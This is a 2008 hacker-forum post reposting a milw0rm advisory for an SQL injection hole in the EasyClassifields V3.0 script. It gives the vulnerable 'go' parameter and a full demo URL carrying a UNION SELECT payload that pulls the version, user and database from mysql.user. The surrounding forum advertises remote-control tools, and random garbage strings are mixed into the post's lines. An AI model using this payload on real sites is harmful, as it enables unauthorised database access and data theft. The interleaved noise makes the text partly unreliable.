学盟技术交流中心 » 技术文章 » easyclassifields V3.0SQL注入漏洞
学盟技术论坛版主招聘 学生黑客联盟专版灰鸽子 Build 20080117 盟友每日签到处.增加贡献值! 学盟作品发布方式 点此投稿!
新人报道贴 赚取学盟金币! 学生黑客联盟远控黄金版 Build 20080118 学盟开启邀请码.送给你需要的朋友 滨哥和佳佳的blog!
本页主题: easyclassifields V3.0SQL注入漏洞 打印 | 加为IE收藏 | 复制链接 | 收藏主题 | 上一主题 | 下一主题

鎏锦
心若一动,泪行千里。一笑间,云淡风轻。
特殊贡献奖
级别: 总版主


论坛精华: 2
疯狂发帖: 2229
学盟威望: 206 点
学盟金币: 7498 金
学盟贡献: 94 点
学盟好评: 76 分
学盟神石: 0 块
学盟社团: 狼势力社团
在线时间:1907(小时)
签名状态: 未签到-[209次/102天]
注册时间:2007-08-31
最后登录:2008-12-01
引用 推荐 编辑 购买 只看 复制

 easyclassifields V3.0SQL注入漏洞

0
文章来自:http://www.milw0rm.com/ {UX[SAQ  
t-#Y6U}b+  
脚本网站: http://myiosoft.com/?1.6.0.0 ;1`NsYI2  
漏洞存在: cB5|% @$I  
http://www.inthewild.xxx/path/index.php?PageSection=x&page=browse&go=<sql> 23a&m04Rk  
演示地址: ;D5B$ @W>  
http://myiosoft.com/products/EasyClassifields/demo/staticpages/easyclassifields/index.php?PageSection=0&page=browse&go=-1%20union%20select%20all%20concat(0x3a,version(),0x3a,user(),0x3a,0x3a,database()),2%20from%20mysql.user
顶端 Posted: 2008-09-02 18:01 | [楼 主]
帖子浏览记录 版块浏览记录
学盟技术交流中心 » 技术文章

Total 0.032478(s) query 5, Time now is:12-02 09:21, Gzip enabled 黑ICP备05002849号
Powered by PHPWind v6.3.2 Certificate Code © 2003-07 PHPWind.com Corporation